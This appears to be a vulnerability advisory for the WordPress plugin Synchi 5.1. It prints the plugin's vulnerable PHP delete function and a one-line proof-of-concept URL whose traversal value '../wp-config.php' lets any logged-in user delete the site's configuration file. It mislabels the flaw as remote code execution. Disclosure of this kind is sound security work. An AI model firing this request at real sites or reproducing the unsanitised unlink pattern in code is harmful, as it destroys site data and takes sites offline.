Plugin Synchi 5.1 – Arbitrary File Deletion – Unlink

Details

  • Name : Synchi
  • Version : 5.1
  • Homepage : https://wordpress.org/plugins/synchi/

Type

  • Remote Code Execution - RCE

Description

  • Type user access: any user registered.
  • $_REQUEST['filename'] is not escaped.

Code

Path: /wp-content/plugins/synchi/synchi.php Line: 490
function synchi_action_delete_file()
{
    // get filename
    $filename = $_REQUEST['filename'];

    if (is_dir($filename)) $success = synchi_delete_directory($filename);
    else $success = unlink($filename);

    if ($success) synchi_ajax_response(true);
    else synchi_ajax_error("Unable to delete file/folder!");
}

Proof Concept

1 – Log in with any user. 2 - Access url: http://target/wp-admin/?synchi_action&synchi_action=delete_file&filename=../wp-config.php

Results

wp-config deleted and restart the all system.

Note


Solution


Timeline

  • Date Discovery : 11/22/2017
  • Date Vendor Contact : 12/24/2017
  • Date Publish :
  • Date Resolution :

Back to Top